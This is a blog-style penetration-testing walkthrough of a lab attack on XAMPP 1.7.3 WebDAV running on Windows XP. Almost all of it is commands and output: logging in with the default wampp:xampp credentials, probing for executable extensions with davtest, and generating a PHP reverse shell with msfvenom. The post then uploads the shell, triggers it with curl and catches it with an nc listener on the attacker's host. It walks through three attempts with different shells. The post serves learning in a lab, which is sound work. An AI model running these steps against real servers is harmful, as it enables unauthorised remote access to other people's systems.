This will be a quick post. On XAMPP 1.7.3 or previous versions, the WebDAV plugin is enabled by default. The default credentials are (wampp:xampp). My target is a Windows XP (SP3) machine. I know the exploit seems really old, but it’s a great way to learn.

I’ll be using cadaver, a command-line WebDAV client for unix to communicate with service. It supports file upload, move/copy, delete, and so on.

root@kali:~# cadaver http://192.168.100.26/webdav
Authentication required for XAMPP with WebDAV on server `192.168.100.26':
Username: wampp
Password: 
dav:/webdav/> 

I’m logged it. Use the help command to list the available commands:

dav:/webdav/> help
Available commands: 
 ls         cd         pwd        put        get        mget       mput       
 edit       less       mkcol      cat        delete     rmcol      copy       
 move       lock       unlock     discover   steal      showlocks  version    
 checkin    checkout   uncheckout history    label      propnames  chexec     
 propget    propdel    propset    search     set        open       close      
 echo       quit       unset      lcd        lls        lpwd       logout     
 help       describe   about      
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> 

That’s interesting. Let’s upload a simple ‘test.txt’ file, and navigate to that url using curl:

dav:/webdav/> put test.txt
Uploading test.txt to `/webdav/test.txt':
Progress: [=============================>] 100.0% of 32 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.100.26' closed.
root@kali:~# 
root@kali:~# 
root@kali:~# curl http://192.168.100.26/webdav/test.txt
Test File >>> Upload == Success
root@kali:~# 

Files with .txt is allowed. But not all files can executed or interpreted by the server. To try and test all the extentions out there, would take a immense amount of time.

Another utility called davtest can do that in a matter of seconds:

root@kali:~# davtest -url http://192.168.100.26/webdav -auth wampp:xampp -cleanup
********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://192.168.100.26/webdav
********************************************************
NOTE	Random string for this session: uOtzoG8cI1__
********************************************************
 Creating directory
MKCOL		SUCCEED:		Created http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__
********************************************************
 Sending test files
PUT	shtml	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.shtml
PUT	pl	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.pl
PUT	php	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.php
PUT	jsp	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.jsp
PUT	txt	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.txt
PUT	cfm	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.cfm
PUT	asp	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.asp
PUT	cgi	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.cgi
PUT	jhtml	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.jhtml
PUT	html	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.html
PUT	aspx	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.aspx
********************************************************
 Checking for test file execution
EXEC	shtml	FAIL
EXEC	pl	FAIL
EXEC	php	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.php
EXEC	jsp	FAIL
EXEC	txt	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.txt
EXEC	cfm	FAIL
EXEC	asp	FAIL
EXEC	cgi	FAIL
EXEC	jhtml	FAIL
EXEC	html	SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__/davtest_uOtzoG8cI1__.html
EXEC	aspx	FAIL
********************************************************
 Cleaning up
DELETE		SUCCEED:	http://192.168.100.26/webdav/DavTestDir_uOtzoG8cI1__

********************************************************
--snip--

The -cleanup flag will delete all uploaded files before exiting. Only txt, php, and html files can be executed.

Click here to read more about how to bypass Unrestricted File Upload.

PHP files are allowed. I will generate a php reverse shell with msfvenom:

root@kali:~# msfvenom -p php/reverse_php LHOST=192.168.100.30 LPORT=12345 -f raw > revshell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 3058 bytes
root@kali:~# 

Uploading the payload:

dav:/webdav/> put revshell.php
Uploading revshell.php to `/webdav/revshell.php':
Progress: [=============================>] 100.0% of 3058 bytes succeeded.
dav:/webdav/> 

Using curl to trigger the shell:

root@kali:~# curl -s http://192.168.100.26/webdav/revshell.php

By typing cmd on my nc listener after connecting, an interactive command prompt will be presented:

root@kali:~# nc -nlvp 12345
listening on [any] 12345 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.26] 1118
cmd
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xampp\webdav>

Second Attempt

I'’ll use the php reverse shell that is shipped with kali. It can found here:

/usr/share/webshells/php/php-reverse-shell.php

The reverse shell is from pentestmonkey. It’s only been tested on linux. Some tweak needs to be made:

  • $ip = ‘192.168.100.3’; //Input you IP
  • $port = 12345; //Input Port
  • $shell = ‘cmd’; // Shell to execute
root@kali:~# cadaver http://192.168.100.26/webdav
Authentication required for XAMPP with WebDAV on server `192.168.100.26':
Username: wampp
Password: 
dav:/webdav/> put php-reverse-shell.php
Uploading php-reverse-shell.php to `/webdav/php-reverse-shell.php':
Progress: [=============================>] 100.0% of 5477 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.100.26' closed.
root@kali:~# curl http://192.168.100.26/webdav/php-reverse-shell.php

On my listener:

root@kali:~# nc -nlvp 12345
listening on [any] 12345 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.26] 1056
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xampp\apache>

Now i’m in C:\xampp\apache>. But I when run commands, there’s no output. More editing is required for Windows.

Third Attempt

This time i’ll be using this reverse shell. It works:

root@kali:~/winxp/windows-php-reverse-shell# nc -nlvp 12345
listening on [any] 12345 ...
connect to [192.168.100.30] from (UNKNOWN) [192.168.100.26] 1059
b374k shell : connected

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\Temp>set u
set u
USERPROFILE=C:\Documents and Settings\LocalService

C:\WINDOWS\Temp>